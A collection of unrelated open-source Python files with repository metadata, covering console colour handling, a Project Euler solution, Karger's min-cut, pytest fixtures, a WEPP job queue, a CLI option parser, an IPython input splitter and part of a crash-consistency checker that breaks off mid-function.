def get_position(self, handle):
position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition
# Because Windows coordinates are 0-based,
# and win32.SetConsoleCursorPosition expects 1-based.
position.X += 1
position.Y += 1
return position
def set_cursor_position(self, position=None, on_stderr=False):
if position is None:
# I'm not currently tracking the position, so there is no default.
# position = self.get_position()
return
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
win32.SetConsoleCursorPosition(handle, position)
def cursor_adjust(self, x, y, on_stderr=False):
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
position = self.get_position(handle)
adjusted_position = (position.Y + y, position.X + x)
win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False)
def erase_screen(self, mode=0, on_stderr=False):
# 0 should clear from the cursor to the end of the screen.
# 1 should clear from the cursor to the beginning of the screen.
# 2 should clear the entire screen, and move cursor to (1,1)
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
csbi = win32.GetConsoleScreenBufferInfo(handle)
# get the number of character cells in the current buffer
cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y
# get number of character cells before current cursor position
cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X
if mode == 0:
from_coord = csbi.dwCursorPosition
cells_to_erase = cells_in_screen - cells_before_cursor
if mode == 1:
from_coord = win32.COORD(0, 0)
cells_to_erase = cells_before_cursor
elif mode == 2:
from_coord = win32.COORD(0, 0)
cells_to_erase = cells_in_screen
# fill the entire screen with blanks
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
# now set the buffer's attributes accordingly
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
if mode == 2:
# put the cursor where needed
win32.SetConsoleCursorPosition(handle, (1, 1))
def erase_line(self, mode=0, on_stderr=False):
# 0 should clear from the cursor to the end of the line.
# 1 should clear from the cursor to the beginning of the line.
# 2 should clear the entire line.
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
csbi = win32.GetConsoleScreenBufferInfo(handle)
if mode == 0:
from_coord = csbi.dwCursorPosition
cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X
if mode == 1:
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
cells_to_erase = csbi.dwCursorPosition.X
elif mode == 2:
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
cells_to_erase = csbi.dwSize.X
# fill the entire screen with blanks
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
# now set the buffer's attributes accordingly
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
def set_title(self, title):
win32.SetConsoleTitle(title)
|
deathsec/instagram-py
|
InstagramPy/colors/winterm.py
|
Python
|
mit
| 6,314
|
#! /usr/bin/env python3
import prime
from itertools import islice
description = """
Truncatable primes
Problem 37
The number 3797 has an interesting property. Being prime itself, it is possible to continuously remove digits from left to right, and remain prime at each stage: 3797, 797, 97, and 7. Similarly we can work from right to left: 3797, 379, 37, and 3.
Find the sum of the only eleven primes that are both truncatable from left to right and right to left.
NOTE: 2, 3, 5, and 7 are not considered to be truncatable primes.
"""
def isTruncatable(p):
if p < 10: return False
strp = str(p)
ps = [int(strp[i:]) for i in range(1, len(strp))] + [int(strp[:i]) for i in range(1, len(strp))]
return all(prime.isPrime(x) for x in ps)
assert(isTruncatable(3797))
assert(not isTruncatable(5))
assert(not isTruncatable(41))
truncatablePrimes = (p for p in prime.primes() if isTruncatable(p))
print(sum(islice(truncatablePrimes, 11)))
|
mbuhot/mbuhot-euler-solutions
|
python/problem-037.py
|
Python
|
mit
| 945
|
# A continuacion el algoritmo de corte minimo
# dado un grafo
# La implementacion de este algoritmo fue desarrollada por Raul Bernardo
# Rodas Herrera, el 20 de Septiembre del ano 2013.
# Se importan las librerias correspondientes
# Libreria para el manejo de grafos.
# Para obtener valores aleatorios
import random
#################################################
# Esta funcion modifica el grafo dado un par de nodos para contraer
def contraer(grafo, nodo_1, nodo_2):
# Nodos unidos: En esta parte lo que se hace es ordenar el string
# que contiene los nodos que estan unidos
nuevo_nodo = "%s,%s" % (nodo_1, nodo_2)
nuevo_nodo = sorted([int(i) for i in nuevo_nodo.split(',')])
nuevo_nodo = ','.join(str(i) for i in nuevo_nodo)
# Listado de nodos que se mantienen y que se unen
nodos = grafo.nodes()
nodos_mantienen = set(nodos) - set([nodo_1]) - set([nodo_2])
nodos_mantienen = [i for i in nodos_mantienen]
#nodos_mantienen = [i for i in nodos if (i != nodo_1 and i != nodo_2)]
# Se crea el grafo contraido, vacio
contraccion = grafo.subgraph(nodos_mantienen)
# Se agrega el nodo que se merge/unio
# contraccion.add_node(nuevo_nodo)
# Se agregan los arcos con peso, del nuevo nodo
# Esta parte genera un listado con las distancias de los nodos que se
# unieron.
iterador = grafo.edges_iter(nbunch=[nodo_1, nodo_2], data="weight")
# Con esta linea agregar los arcos que correspondian a la fucion de nodos
lista_agregar = [(i[0], i[1], i[2]['weight'])
for i in iterador
if ([i[0], i[1]] != [nodo_1, nodo_2]
and [i[1], i[0]] != [nodo_1, nodo_2])]
# Aqui se remplazan los nombres
lista_agregar = [(nuevo_nodo, tupla[1], tupla[2])
if (tupla[0] == nodo_1 or tupla[0] == nodo_2)
else (tupla[0], nuevo_nodo, tupla[2])
for tupla in lista_agregar]
# Finalmente se agrega la lista
contraccion.add_weighted_edges_from(lista_agregar)
# Se retorna el grafico contraido
return contraccion
################################################
def transformar_a_conj(elemento):
"""Esta funcion transforma el elemento rapidamente en un conjunto"""
if type(elemento) == str:
conjunto = set([int(i) for i in elemento.split(',')])
else:
conjunto = set([elemento])
return conjunto
# Funcion que chequea pertenencia
def chequeadora_pertenencia(arco_inicial, arco_chequear):
# que la condicionparta siendo False, significa que el archo a chequear no
# deberia ser parte del listado de no seleccionables.
condicion = False
# Primero voy a transformar los nodos de "arco_chequear" en un conjunto
conj_1 = transformar_a_conj(arco_chequear[0])
conj_2 = transformar_a_conj(arco_chequear[1])
# Lo mismo pero con el "arco_inicial"
subconj_1 = transformar_a_conj(arco_inicial[0])
subconj_2 = transformar_a_conj(arco_inicial[1])
# Chequeo si los elemento de "arco_inicial" estan en "arco_chequear"
if subconj_1.issubset(conj_1) and subconj_2.issubset(conj_2):
condicion = True
elif subconj_2.issubset(conj_1) and subconj_1.issubset(conj_2):
condicion = True
return condicion
#################################################
# Aqui se define la funcion que genera un grafo contraido
def contraer_hasta_2_nodos(grafo, arco_inicial=None):
# Se estima este parametro, el cual es condicion de detencion
num_vertices_grafo = len(grafo.nodes())
# Variable que indica si se es la primera iteracion o no
primera_iteracion = True
# Mientras la cantidad de vertices sea mayor estricto que 2, procede:
while num_vertices_grafo > 2:
# El siguiente es el conjunto de donde se elige el arco al azar, notese
# que se sustrae el arco seleccionado como arco_inicial
if primera_iteracion:
# Al final de esta iteracion la variable se marca como False
conjunto_eleccion_arco = set(grafo.edges()).difference(
[arco_inicial])
listado_seleccion = list(conjunto_eleccion_arco)
elem_rand = random.choice(listado_seleccion)
indice_arco_azar = grafo.edges().index(elem_rand)
primera_iteracion = False
# Puesto que se esta en la segunda iteracion, o mayor
else:
# Se crea/limpia el listado_no_elegible
listado_no_elegible = []
# Aqui comienzan las modificaciones respectivas.
for arco in grafo.edges():
# Este se_elige_arco puede parecer confuso, en realidad es un
# se elige para no ser elegido, es por eso que si es True la
# respuesta de la funcion para a incorporarse al listado de no
# seleccionados.
se_elige_arco = chequeadora_pertenencia(arco_inicial,
arco)
if se_elige_arco:
listado_no_elegible.append(arco)
conjunto_eleccion_arco = set(grafo.edges()).difference(
listado_no_elegible)
listado_seleccion = list(conjunto_eleccion_arco)
elem_rand = random.choice(listado_seleccion)
indice_arco_azar = grafo.edges().index(elem_rand)
primera_iteracion = False
nodo_1 = grafo.edges()[indice_arco_azar][0]
nodo_2 = grafo.edges()[indice_arco_azar][1]
# Contrae en UN SOLO nodo los nodos del vertice elegido.
# Recordar que esto actualiza el grafo
grafo = contraer(grafo, nodo_1, nodo_2)
# Se estima este parametro, el cual es condicion de detencion
num_vertices_grafo = len(grafo.nodes())
# Retorna el grafo final
return grafo
#################################################
# Aqui se define la funcion, recordar que G,
# es una instancia "grafo" del tipo "networkX"
def min_cut(grafo, num_iteraciones=1000, arco_inicial=None):
# Suma del corte inicial, esto es infinito
suma_corte_minimo = 9999999999999999
# Se establece el conjunto de arcos cortados de manera vacia
conj_arcos_cortados = set()
### ESTE FOR ES PARALELIZABLE ###
# Numero de iteraciones buscando el valor minimo
for iteracion in range(num_iteraciones):
# Se contrae el grafo
resultado = contraer_hasta_2_nodos(grafo, arco_inicial)
# Suma del MultiGrafo resultante.
iterador = resultado.edges_iter(data="weight")
suma_corte = sum([i[2]["weight"] for i in iterador])
# Si se supera el valor anterior
if suma_corte < suma_corte_minimo:
# Suma del corte
suma_corte_minimo = suma_corte
# Se guarda el mejor grafo hasta el minuto
grafo_final = resultado
##################################################
# A continuacion lleno el conjunto de arcos cortados
# Si el primer nodo de los dos resultantes es un entero:
nodo_1 = grafo_final.nodes()[0]
nodo_2 = grafo_final.nodes()[1]
if type(nodo_1) == int:
# El segundo obligadamente es un String
conj_arcos_cortados = set(
[tuple(sorted((nodo_1, int(i))))
for i in nodo_2.split(',')])
# si no es un entero, entonces es un String
else:
# en ese caso el segundo puede ser un entero
if type(nodo_2) == int:
# en cuyo caso se hace la misma idea que el primer "if"
conj_arcos_cortados = set(
[tuple(sorted((int(i), nodo_2)))
for i in nodo_1.split(',')])
# Por otro lado si es tambien un String
else:
conj_arcos_cortados = set(
[tuple(sorted((int(i), int(j))))
for i in nodo_1.split(',')
for j in nodo_2.split(',')])
# Se asignan nuevos atributos
grafo_final.Suma_corte_minimo = suma_corte_minimo
grafo_final.conj_arcos_cortados = conj_arcos_cortados
return grafo_final
|
BRodas/k-cut
|
lib_python/Min_Cut_Kargers.py
|
Python
|
mit
| 8,073
|
import pytest
import chainerx.testing
from chainerx_tests import cuda_utils
def pytest_configure(config):
_register_cuda_marker(config)
def pytest_runtest_setup(item):
_setup_cuda_marker(item)
def pytest_runtest_teardown(item, nextitem):
current_device = cuda_utils.get_current_device()
assert current_device is None or current_device == 0
def pytest_generate_tests(metafunc):
marker = [
m for m in metafunc.definition.iter_markers()
if m.name == 'parametrize_device']
if marker:
marker, = marker # asserts len == 1
device_names, = marker.args
metafunc.parametrize('device', device_names, indirect=True)
def _register_cuda_marker(config):
config.addinivalue_line(
'markers',
'cuda(num=1): mark tests needing the specified number of NVIDIA GPUs.')
def _setup_cuda_marker(item):
"""Pytest marker to indicate number of NVIDIA GPUs required to run the test.
Tests can be annotated with this decorator (e.g., ``@pytest.mark.cuda``) to
declare that one NVIDIA GPU is required to run.
Tests can also be annotated as ``@pytest.mark.cuda(2)`` to declare number
of NVIDIA GPUs required to run. When running tests, if
``CHAINERX_TEST_CUDA_DEVICE_LIMIT`` environment variable is set to value
greater than or equals to 0, test cases that require GPUs more than the
limit will be skipped.
"""
cuda_marker = [m for m in item.iter_markers() if m.name == 'cuda']
if cuda_marker:
cuda_marker, = cuda_marker # asserts len == 1
required_num = cuda_marker.args[0] if cuda_marker.args else 1
if cuda_utils.get_cuda_limit() < required_num:
pytest.skip('{} NVIDIA GPUs required'.format(required_num))
def _get_required_cuda_devices_from_device_name(device_name):
# Returns the number of required CUDA devices to run a test, given a
# device name. If the device is non-CUDA device, 0 is returned.
s = device_name.split(':')
assert len(s) == 2
if s[0] != 'cuda':
return 0
return int(s[1]) + 1
@pytest.fixture
def device(request):
# A fixture to wrap a test with a device scope, given a device name.
# Device instance is passed to the test.
device_name = request.param
# Skip if the device is CUDA device and there's no sufficient CUDA devices.
cuda_device_count = _get_required_cuda_devices_from_device_name(
device_name)
if cuda_device_count > cuda_utils.get_cuda_limit():
pytest.skip()
device = chainerx.get_device(device_name)
device_scope = chainerx.using_device(device)
def finalize():
device_scope.__exit__()
request.addfinalizer(finalize)
device_scope.__enter__()
return device
@pytest.fixture(params=chainerx.testing.all_dtypes)
def dtype(request):
return request.param
@pytest.fixture(params=chainerx.testing.float_dtypes)
def float_dtype(request):
return request.param
@pytest.fixture(params=chainerx.testing.signed_dtypes)
def signed_dtype(request):
return request.param
@pytest.fixture(params=chainerx.testing.numeric_dtypes)
def numeric_dtype(request):
return request.param
@pytest.fixture(params=[True, False])
def is_module(request):
return request.param
_shapes = [
(),
(0,),
(1,),
(2, 3),
(1, 1, 1),
(2, 0, 3),
]
_shapes_as_sequence_or_int = (
_shapes
+ [[], [0]] # shape as a list instead of tuple
+ [0, 1, 5])
@pytest.fixture(params=_shapes)
def shape(request):
return request.param
@pytest.fixture(params=_shapes_as_sequence_or_int)
def shape_as_sequence_or_int(request):
return request.param
|
okuta/chainer
|
tests/chainerx_tests/conftest.py
|
Python
|
mit
| 3,665
|
"""Place jobs into our DEP queue!"""
import sys
import os
import datetime
import time
from io import StringIO
import pika
from pyiem.util import get_dbconn, logger
YEARS = datetime.date.today().year - 2006
class WeppRun:
"""Represents a single run of WEPP.
Filenames have a 51 character restriction.
"""
def __init__(self, huc12, fpid, clifile, scenario):
"""We initialize with a huc12 identifier and a flowpath id"""
self.huc12 = huc12
self.huc8 = huc12[:8]
self.subdir = f"{huc12[:8]}/{huc12[8:]}"
self.fpid = fpid
self.clifile = clifile
self.scenario = scenario
def _getfn(self, prefix):
"""boilerplate code to get a filename."""
return (
f"/i/{self.scenario}/{prefix}/{self.subdir}/"
f"{self.huc12}_{self.fpid}.{prefix}"
)
def get_wb_fn(self):
"""Return the water balance filename for this run"""
return self._getfn("wb")
def get_env_fn(self):
"""Return the event filename for this run"""
return self._getfn("env")
def get_ofe_fn(self):
"""Return the filename used for OFE output"""
return self._getfn("ofe")
def get_man_fn(self):
"""Return the management filename for this run"""
return self._getfn("man")
def get_slope_fn(self):
"""Return the slope filename for this run"""
return self._getfn("slp")
def get_soil_fn(self):
"""Return the soil filename for this run"""
return self._getfn("sol")
def get_clifile_fn(self):
"""Return the climate filename for this run"""
return self.clifile
def get_runfile_fn(self):
"""Return the run filename for this run"""
return self._getfn("run")
def get_yield_fn(self):
"""Filename to be used for yield output"""
return self._getfn("yld")
def get_event_fn(self):
"""Filename to be used for event output"""
return self._getfn("event")
def get_crop_fn(self):
"""Filename to be used for crop output."""
return self._getfn("crop")
def get_graphics_fn(self):
"""Filename to be used for crop output."""
return self._getfn("grph")
def make_runfile(self):
"""Create a runfile for our runs"""
out = StringIO()
out.write("E\n") # English units
out.write("Yes\n") # Run Hillslope
out.write("1\n") # Continuous simulation
out.write("1\n") # hillslope version
out.write("No\n") # pass file output?
out.write("1\n") # abbreviated annual output
out.write("No\n") # initial conditions output
out.write("/dev/null\n") # soil loss output file
out.write("Yes\n") # Do water balance output
out.write(f"{self.get_wb_fn()}\n") # water balance output file
out.write("No\n") # crop output
# out.write("%s\n" % (self.get_crop_fn(),)) # crop output file
out.write("No\n") # soil output
out.write("No\n") # distance and sed output
if self.huc12 in ["090201081101", "090201081102", "090201060605"]:
out.write("Yes\n") # large graphics output
out.write(f"{self.get_graphics_fn()}\n")
else:
out.write("No\n") # large graphics output
out.write("Yes\n") # event by event output
out.write(f"{self.get_env_fn()}\n") # event file output
out.write("No\n") # element output
# out.write("%s\n" % (self.get_ofe_fn(),))
out.write("No\n") # final summary output
out.write("No\n") # daily winter output
out.write("Yes\n") # plant yield output
out.write(f"{self.get_yield_fn()}\n") # yield file
out.write(f"{self.get_man_fn()}\n") # management file
out.write(f"{self.get_slope_fn()}\n") # slope file
out.write(f"{self.get_clifile_fn()}\n") # climate file
out.write(f"{self.get_soil_fn()}\n") # soil file
out.write("0\n") # Irrigation
out.write(f"{YEARS}\n") # years 2007-
out.write("0\n") # route all events
out.seek(0)
return out.read()
def main(argv):
"""Go main Go."""
scenario = int(argv[1])
log = logger()
myhucs = []
if os.path.isfile("myhucs.txt"):
log.warning("Using myhucs.txt to filter job submission")
with open("myhucs.txt", encoding="ascii") as fh:
myhucs = [s.strip() for s in fh]
idep = get_dbconn("idep")
icursor = idep.cursor()
icursor.execute(
"SELECT huc_12, fpath, climate_file from flowpaths "
"where scenario = %s",
(scenario,),
)
totaljobs = icursor.rowcount
connection = pika.BlockingConnection(
pika.ConnectionParameters(host="iem-rabbitmq.local")
)
channel = connection.channel()
channel.queue_declare(queue="dep", durable=True)
sts = datetime.datetime.now()
for row in icursor:
if myhucs and row[0] not in myhucs:
continue
wr = WeppRun(row[0], row[1], row[2], scenario)
channel.basic_publish(
exchange="",
routing_key="dep",
body=wr.make_runfile(),
properties=pika.BasicProperties(
delivery_mode=2 # make message persistent
),
)
# Wait a few seconds for the dust to settle
time.sleep(10)
percentile = 1.0001
while True:
now = datetime.datetime.now()
cnt = channel.queue_declare(
queue="dep", durable=True
).method.message_count
done = totaljobs - cnt
if (cnt / float(totaljobs)) < percentile:
log.info(
"%6i/%s [%.3f /s]",
cnt,
totaljobs,
done / (now - sts).total_seconds(),
)
percentile -= 0.1
if (now - sts).total_seconds() > 36000:
log.error("ERROR, 10 Hour Job Limit Hit")
break
if cnt == 0:
log.info("%s Done!", now.strftime("%H:%M"))
break
time.sleep(30)
connection.close()
if __name__ == "__main__":
main(sys.argv)
|
akrherz/dep
|
scripts/RT/enqueue_jobs.py
|
Python
|
mit
| 6,180
|
from .toolkit_tests import ToolkitTests
|
DarkmatterVale/regex4dummies
|
regex4dummies/tests/toolkit_tests/__init__.py
|
Python
|
mit
| 40
|
"""
Created on 22 Jun 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
import optparse
from scs_core.display.display_conf import DisplayConf
# --------------------------------------------------------------------------------------------------------------------
class CmdDisplayConf(object):
"""
unix command line handler
"""
# ----------------------------------------------------------------------------------------------------------------
def __init__(self):
self.__parser = optparse.OptionParser(usage="%prog [{ [-m MODE] [-n NAME] [-u STARTUP] [-s SHUTDOWN] "
"[-t { 1 | 0 }] | -d }] [-v]", version="%prog 1.0")
# optional...
self.__parser.add_option("--mode", "-m", type="string", nargs=1, action="store", dest="mode",
help="set display mode (SYS only)")
self.__parser.add_option("--name", "-n", type="string", nargs=1, action="store", dest="name",
help="set device name")
self.__parser.add_option("--startup", "-u", type="string", nargs=1, action="store", dest="startup",
help="set startup message")
self.__parser.add_option("--shutdown", "-s", type="string", nargs=1, action="store", dest="shutdown",
help="set shutdown message")
self.__parser.add_option("--show-time", "-t", type="int", nargs=1, action="store", dest="show_time",
help="show current time")
self.__parser.add_option("--delete", "-d", action="store_true", dest="delete", default=False,
help="delete display configuration")
self.__parser.add_option("--verbose", "-v", action="store_true", dest="verbose", default=False,
help="report narrative to stderr")
self.__opts, self.__args = self.__parser.parse_args()
# ----------------------------------------------------------------------------------------------------------------
def is_valid(self):
if self.set() and self.delete:
return False
if self.mode is not None and self.mode not in DisplayConf.modes():
return False
return True
def is_complete(self):
if self.mode is None or self.device_name is None or \
self.startup_message is None or self.shutdown_message is None or self.show_time is None:
return False
return True
def set(self):
return self.mode is not None or self.device_name is not None or \
self.startup_message is not None or self.shutdown_message is not None or self.show_time is not None
# ----------------------------------------------------------------------------------------------------------------
@property
def mode(self):
return self.__opts.mode
@property
def device_name(self):
return self.__opts.name
@property
def startup_message(self):
return self.__opts.startup
@property
def shutdown_message(self):
return self.__opts.shutdown
@property
def show_time(self):
return None if self.__opts.show_time is None else bool(self.__opts.show_time)
@property
def delete(self):
return self.__opts.delete
@property
def verbose(self):
return self.__opts.verbose
# ----------------------------------------------------------------------------------------------------------------
def print_help(self, file):
self.__parser.print_help(file)
def __str__(self, *args, **kwargs):
return "CmdDisplayConf:{mode:%s, device_name:%s, startup_message:%s, shutdown_message:%s, show_time:%s, " \
"delete:%s, verbose:%s}" % \
(self.mode, self.device_name, self.startup_message, self.shutdown_message, self.show_time,
self.delete, self.verbose)
|
south-coast-science/scs_mfr
|
src/scs_mfr/cmd/cmd_display_conf.py
|
Python
|
mit
| 4,026
|
""" smashlib.inputsplitter
"""
import re
import os
ope = os.path.exists
from IPython.core.inputsplitter import IPythonInputSplitter
r_ed = 'ed [^:]*'
class SmashInputSplitter(IPythonInputSplitter):
""" It may be useful for something else in the future, but at the moment
Smash overrides the core IPythonInputSplitter for just one reason:
We want to force commands like "ed /some/path/file_name.txt:<col>:"
to be interpretted as complete input. The use case is that
this format is often used as output for command line tools (for
instance ack-grep)
"""
def push(self, lines):
result = super(SmashInputSplitter, self).push(lines)
lines = lines.strip()
match = re.compile(r_ed).match(lines)
if match:
fname = match.group().split()[1]
if ope(fname):
self.source += '\n'
return result
|
mattvonrocketstein/smash
|
smashlib/inputsplitter.py
|
Python
|
mit
| 922
|
#!/usr/bin/env python
#Copyright (c) 2016 Ramnatthan Alagappan
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import os
import subprocess
import cProfile
import Queue
import threading
import time
import pprint
import code
import sys
import collections
import gc
from _paceutils import *
from pace import DSReplayer
from pacedefaultfs import defaultfs, defaultnet
import itertools
import pickle
from collections import defaultdict
import math
class MultiThreadedChecker(threading.Thread):
queue = Queue.Queue()
outputs = {}
def __init__(self, queue, thread_id='0'):
threading.Thread.__init__(self)
self.queue = MultiThreadedChecker.queue
self.thread_id = str(thread_id)
def __threaded_check(self, base_path, dirnames, client_stdout, crashid):
assert type(paceconfig(0).checker_tool) in [list, str, tuple]
dirname_param = ''
for dirname in dirnames.values():
dirname_param += str(dirname) + str('@')
args = [paceconfig(0).checker_tool, dirname_param, base_path, client_stdout, self.thread_id]
retcode = subprocess.call(args)
MultiThreadedChecker.outputs[crashid] = retcode
def run(self):
while True:
task = self.queue.get()
self.__threaded_check(*task)
self.queue.task_done()
@staticmethod
def check_later(base_path, dirnames, client_stdout, retcodeid):
MultiThreadedChecker.queue.put((base_path, dirnames, client_stdout, retcodeid))
@staticmethod
def reset():
assert MultiThreadedChecker.queue.empty()
MultiThreadedChecker.outputs = {}
@staticmethod
def wait_and_get_outputs():
MultiThreadedChecker.queue.join()
return MultiThreadedChecker.outputs
def get_crash_point_id_string(crash_point):
toret = ""
for i in range(0, len(crash_point)):
c = crash_point[i]
if c == -1:
c = 'z' # the node has not done any persistent state update
if i < len(crash_point)-1:
toret += str(c) + "-"
else:
toret += str(c)
return toret
def dict_value_product(dicts):
return (dict(zip(dicts, x)) for x in itertools.product(*dicts.itervalues()))
def atleast_one_present(machines, currs, ends):
for m in machines:
if currs[m] < len(ends[m]):
return True
return False
def replay_dir_base_name_RO(crash_point, omit_pt):
assert type(omit_pt) == dict
base_name = get_crash_point_id_string(crash_point)
base_name += "_RO"
def dict_string(d):
toret = ''
for key in d:
toret += '_' + str(key) + '=' + str(d[key])
return toret
base_name += "_OM" + dict_string(omit_pt)
return base_name
def replay_dir_base_name_ARO(crash_point, omit_pt):
assert type(omit_pt) == dict
base_name = get_crash_point_id_string(crash_point)
def dict_string(d):
toret = ''
for key in d:
toret += '_' + str(key) + '=' + str(d[key][1])
return toret
base_name += "_ARO" + dict_string(omit_pt)
return base_name
def replay_dir_base_name_AP(crash_point, end_pt):
assert type(end_pt) == dict
base_name = get_crash_point_id_string(crash_point)
def dict_string(d):
toret = ''
for key in d:
toret += '_' + str(key) + '=' + str(d[key])
return toret
base_name += "_AP" + dict_string(end_pt)
return base_name
def append_or_trunc_ops(replayer, machines, crash_point):
toret = {}
for machine in machines:
curr_op = replayer.micro_ops[machine][crash_point[machine]].op
toret[machine] = curr_op == 'append' or curr_op == 'trunc'
return toret
def nCr(n,r):
func = math.factorial
return func(n) / func(r) / func(n-r)
def get_replay_dirs(machines, base_name):
dirnames = {}
base_path = os.path.join(paceconfig(0).scratchpad_dir, base_name)
for machine in machines:
os.system('rm -rf ' + base_path)
os.system('mkdir -p ' + base_path)
dirnames[machine] = os.path.join(base_path , 'rdir-' + str(machine))
stdout_files = {}
for machine_id in dirnames.keys():
stdout_files[machine_id] = os.path.join(base_path, str(machine_id) + '.input_stdout')
return (base_path, dirnames,stdout_files)
def unique_grp(grps, machines, filter_machines):
assert len(machines) > 0 and len(filter_machines) < len(machines)
to_ret = []
to_ret_set = set()
temp = {}
max_for_state = defaultdict(lambda:-1, temp)
for state in grps:
state_arr = list(state)
for machine in machines:
if machine not in filter_machines:
val = state_arr[machine]
del state_arr[machine]
if tuple(state_arr) not in max_for_state.keys():
max_for_state[tuple(state_arr)] = val
else:
if max_for_state[tuple(state_arr)] < val:
max_for_state[tuple(state_arr)] = val
state_arr.insert(machine, max_for_state[tuple(state_arr)])
to_ret_set.add(tuple(state_arr))
return to_ret_set
def check_logically_same(to_omit_list):
ops_eq = all(x.op == to_omit_list[0].op for x in to_omit_list)
if ops_eq:
name_checking_ops = ['write', 'append', 'creat', 'trunc', 'unlink']
if to_omit_list[0].op in name_checking_ops:
name_eq = all(os.path.basename(x.name) == os.path.basename(to_omit_list[0].name) for x in to_omit_list)
return ops_eq and name_eq
elif to_omit_list[0].op == 'rename':
dest_eq = all(os.path.basename(x.dest) == os.path.basename(to_omit_list[0].dest) for x in to_omit_list)
src_eq = all(os.path.basename(x.source) == os.path.basename(to_omit_list[0].source) for x in to_omit_list)
return ops_eq and dest_eq and src_eq
else:
for omit in to_omit_list:
if 'fsync' in str(omit):
return False
assert False
else:
return False
def compute_reachable_global_prefixes(replayer):
print 'Computing globally reachable prefix states'
assert paceconfig(0).cached_prefix_states_file is not None and len(paceconfig(0).cached_prefix_states_file) > 0
prefix_cached_file = paceconfig(0).cached_prefix_states_file
interesting_prefix_states = []
final_reachable_prefix_fsync_deps = set()
if not os.path.isfile(prefix_cached_file):
print 'No cached file. Computing reachable prefixes from scratch.'
base_lists = replayer.ops_indexes().values()
list0 = base_lists[0]
list1 = base_lists[1]
interesting_prefix_states = []
# Algorithm to find all consistent cuts of persistent states:
# Naive method: Let us say there are 3 machines. Consider that the number of events
# in these traces from three machines as <n1, n2, n3>. So, there are n1 X n2 X n3
# ways in which these traces could combine.
# Should we check for everything?
# No, we can do better; intuition: if i X j is not consistent then any superset of
# it <i, j , k> for any k is inconsistent.
for index1 in list0:
for index2 in list1:
if replayer.is_legal_gp((index1, index2)):
interesting_prefix_states.append((index1, index2))
for i in range(2, len(base_lists)):
interesting_prefix_cache = []
for index in base_lists[i]:
for inter in interesting_prefix_states:
to_check = inter + (index, )
if replayer.is_legal_gp(to_check):
interesting_prefix_cache.append(to_check)
interesting_prefix_states = interesting_prefix_cache
for state in interesting_prefix_states:
index = 0
candidate = []
for point in state:
candidate.append(replayer.persistent_op_index(index, point))
index += 1
candidate = tuple(candidate)
final_reachable_prefix_fsync_deps.add(candidate)
with open(prefix_cached_file, "w") as f:
pickle.dump(final_reachable_prefix_fsync_deps, f, protocol = 0)
else:
print 'Using cached globally reachable states'
with open(prefix_cached_file, "r") as f:
final_reachable_prefix_fsync_deps = pickle.load(f)
final_reachable_prefix_no_deps = set(list(final_reachable_prefix_fsync_deps)[:])
assert not bool(final_reachable_prefix_no_deps.symmetric_difference(final_reachable_prefix_fsync_deps))
# We are mostly done here. But there is one more optimization that we could do.
# if a trace ends with fsync or fdatasync, then it can be skipped for replay
# because there is no specific operation that we need to replay fsyncs. However,
# they are important to calculate FS reordering dependencies. So, we maintain
# two sets: one with fsync deps (we will use when we apply FS reordering),
# one with no fsync deps that we will use to replay globally reachable prefixes
interesting_states_check = set(list(final_reachable_prefix_fsync_deps)[:])
for state in interesting_states_check:
machine = 0
for end_point in state:
if replayer.micro_ops[machine][end_point].op == 'fsync' or replayer.micro_ops[machine][end_point].op == 'fdatasync' or\
replayer.micro_ops[machine][end_point].op == 'file_sync_range':
prev_point = replayer.get_prev_op(state)
# if subsumed by another GRP, just remove this. If not subsumed, leave it
if prev_point in interesting_states_check:
final_reachable_prefix_no_deps.remove(state)
break
machine += 1
assert final_reachable_prefix_fsync_deps is not None and len(final_reachable_prefix_fsync_deps) > 0
assert final_reachable_prefix_no_deps is not None and len(final_reachable_prefix_no_deps) > 0
assert final_reachable_prefix_no_deps <= final_reachable_prefix_fsync_deps
return (final_reachable_prefix_fsync_deps, final_reachable_prefix_no_deps)
def apm_machines(rule_set):
# R3: Relaxed on the master.
# R4: Relaxed on any one slave.
# R5: Relaxed on all nodes at the same time
to_ret = []
#We are assuming about the order of machines
#Fix this assumption - TODO.
if 'r3' in rule_set:
to_ret.append([0])
if 'r4' in rule_set:
to_ret.append([1])
if 'r5' in rule_set:
to_ret.append([0,1,2])
return to_ret
def replay_correlated_global_prefix(replayer, interesting_prefix_states, replay = True):
print 'Checking prefix crash states...'
machines = replayer.conceptual_machines()
replay_start = time.time()
count = 0
for crash_point in interesting_prefix_states:
assert len(crash_point) == len(machines)
base_name = get_crash_point_id_string(crash_point)
base_name += "_GRP"
for machine in machines:
replayer.iops_end_at(machine, (crash_point[machine], replayer.iops_len(machine, crash_point[machine]) - 1))
